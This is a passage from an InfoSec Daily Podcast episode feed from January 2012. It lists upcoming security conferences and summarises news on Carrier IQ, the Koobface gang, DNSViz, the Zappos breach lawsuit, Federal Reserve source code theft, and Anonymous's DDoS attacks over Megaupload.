<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 27-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Atlanta, GA </span><br />
	<a href="http://www.outerz0ne.org/OZ8/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org/OZ8/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.networkworld.com/news/2012/011812-htc-carrieriq-255021.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.networkworld.com/news/2012/011812-htc-carrieriq-255021.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Carrier IQ&#39;s performance monitoring software has been deleted from the latest firmware update for the HTC EVO 3D smartphone, at the behest of Sprint, according to a post at AndroidCentral. Many more could follow.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An earlier Sprint post revealed that the pending firmware version, due for Jan. 12 release, would be a security update. AndroidCentral reported this week that it would also boost battery life and offer an updated Peep client to align with Twitter.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After the version was released, programmers and hackers began delving into it. &quot;Folks who have checked around in the manage applications tab have noticed that &#39;HTC IQAgent&#39; and &#39;IQRD,&#39; both of which were Carrier IQ, are no longer present on the device after the update,&quot; according to AndroidCentral.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sprint, one of several carriers that use the Carrier IQ software, confirmed in December that it had &quot;disabled use of the tool so that diagnostic information data is no longer being collected,&quot; according to a story at MobileBurn, quoting from a Sprint email statement.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The HTC EVO 3D update may indicate that Sprint has ordered its handset partners to remove the software entirely. Email requests to Carrier IQ and Sprint for comment have not yet received replies.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.nytimes.com/2012/01/17/technology/koobface-gang-uses-facebook-to-spread-powerful-worm.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nytimes.com/2012/01/17/technology/koobface-gang-uses-facebook-to-spread-powerful-worm.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Five men believed to be responsible for spreading a notorious computer worm on Facebook and other social networks &mdash; and pocketing several million dollars from online schemes &mdash; are hiding in plain sight in St. Petersburg, Russia, according to investigators at Facebook and several independent computer security researchers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A member of the Koobface gang posted to Foursquare, showing an office, complete with coordinates, in St. Petersburg.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The men live comfortable lives in St. Petersburg &mdash; and have frolicked on luxury vacations in places like Monte Carlo, Bali and, earlier this month, Turkey, according to photographs posted on social network sites &mdash; even though their identities have been known for years to Facebook, computer security investigators and law enforcement officials.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One member of the group, which is popularly known as the Koobface gang, has regularly broadcast the coordinates of its offices by checking in on Foursquare, a location-based social network, and posting the news to Twitter. Photographs on Foursquare also show other suspected members of the group working on Macs in a loftlike room that looks like offices used by tech start-ups in cities around the world.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://share.sandia.gov/news/resources/news_releases/dnsviz/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://share.sandia.gov/news/resources/news_releases/dnsviz/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sandia National Laboratories computer scientist Casey Deccio has developed a visualization tool known as DNSViz to help network administrators within the federal government and global IT community better understand Domain Name System Security (DNSSEC) and to help them troubleshoot problems. (Click</span><a href="http://youtu.be/GDz4Riwfg-0"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to see a short video of Deccio discussing the DNSViz tool.)</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DNSSEC is a security feature mandated for all federal information systems by the White House&rsquo;s Office of Management and Budget (OMB). The 2008 mandate requires that &ldquo;the top level .gov domain will be DNSSEC-signed, and processes to enable secure delegated sub-domains will be developed.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The entity that serves to translate the hostname of a Uniform Resource Locator (URL) into an Internet Protocol (IP) address is known as the Domain Name System (DNS). A DNS &ldquo;lookup&rdquo; is a prerequisite for doing almost anything on the Internet, including Web browsing, emailing or videoconferencing.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the mandate made perfect sense, said Deccio, there soon emerged a problem when .gov organizations actually began deploying DNSSEC.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.komonews.com/news/business/Zappos-Amazon-sued-over-customer-data-breach--137620588.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.komonews.com/news/business/Zappos-Amazon-sued-over-customer-data-breach&#8211;137620588.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials representing Zappos in Nevada and parent company Amazon in Seattle declined comment Wednesday on the lawsuit filed in U.S. District Court in Louisville, Ky.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The lawsuit was filed Monday, after Zappos chief executive Tony Hsieh alerted employees and customers by email Sunday that names, phone numbers and email addresses of the shoe retailer&#39;s customer may have been accessed in a hacker attack. The company said customers&#39; credit card and payment information weren&#39;t stolen.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos urged customers to reset passwords to Zappos.com accounts and any other websites where they use similar passwords.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zappos said the hacker gained access to its internal network and systems through one of the company&#39;s servers in Kentucky. Zappos is based in Henderson, near Las Vegas. It is owned by Seattle-based Amazon.com Inc.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Does anyone else feel like they got this lawsuit out in record time? &nbsp;Almost like they were waiting around for it to happen&#8230;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.theregister.co.uk/2012/01/19/feds_arrest_programmer_for_software_theft/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/19/feds_arrest_programmer_for_software_theft/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A computer programmer has been charged with stealing source code worth $9.5m from the Federal Reserve Bank of New York, according to the FBI and prosecutors.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bo Zhang, a 32-year-old from Queens in New York, was cuffed on suspicion of swiping the Government-wide Accounting and Reporting (GWA) software, used to help keep track of the US government&#39;s finances.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Among other things, the GWA handles ledger accounting for each appropriation, fund, and receipt within the Department of the Treasury, and provides federal agencies with an account statement &#8211; similar to bank statements provided to bank customers &#8211; of the agencies&rsquo; account balances with the United States Treasury,&quot; the US attorney&#39;s office for the Southern District of New York said in</span><a href="http://www.justice.gov/usao/nys/pressreleases/January12/zhangboarrestpr.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> an official statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zhang was hired as a contractor to work on the code where it&#39;s held in an access-controlled electronic repository in New York. During last summer he allegedly stole the GWA code, which has so far cost the US $9.5m to develop.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;According to the complaint, Zhang admitted that in July 2011, while working at the Fed, he checked out and copied the GWA code onto his hard drive at the Fed; he subsequently copied the GWA code onto an Fed-owned external hard drive; and he connected that external hard-drive to his private office computer, his home computer, and his laptop,&quot; the US attorney&#39;s office added.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.pcmag.com/article2/0,2817,2399116,00.asp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2399116,00.asp</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous was quick to target the Justice Department, Universal Music, the RIAA, and MPAA in the wake of this afternoon&#39;s Megaupload announcement, with the Web sites for all four organizations succumbing to distributed denial of service (DDoS) attacks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Justice.gov and universalmusic.com went offline around 430pm Eastern and have been largely unresponsive for the past 1.5 hours. RIAA.com and MPAA.org are also unresponsive.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Recording Industry Association of America&mdash;Department of Justice&mdash;Universal Music&mdash;all TT, all TANGO DOWN,&quot; Anonymous tweeted this evening with the #OpMegaUpload hashtag.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Earlier today, the DOJ announced the shutdown of file-sharing site Megaupload. Seven individuals and two corporations were indicted for copyright infringement and could face up to 50 years in prison. Megaupload earned approximately $750 million for its exploits and incurred about $1 billion in damages, the agency alleged.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its statement, the DOJ said the takedown was &quot;among the largest criminal copyright cases ever brought by the United States.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-572-carrier-iq-koobface-dnsviz-obligatory-lawsuit-source-code-swipe-doj-tango-down/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3395/0/infosec-daily-podcast-episode-572.mp3" length="18772572" type="audio/mpeg" />
		<itunes:duration>0:39:04</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	&#160;
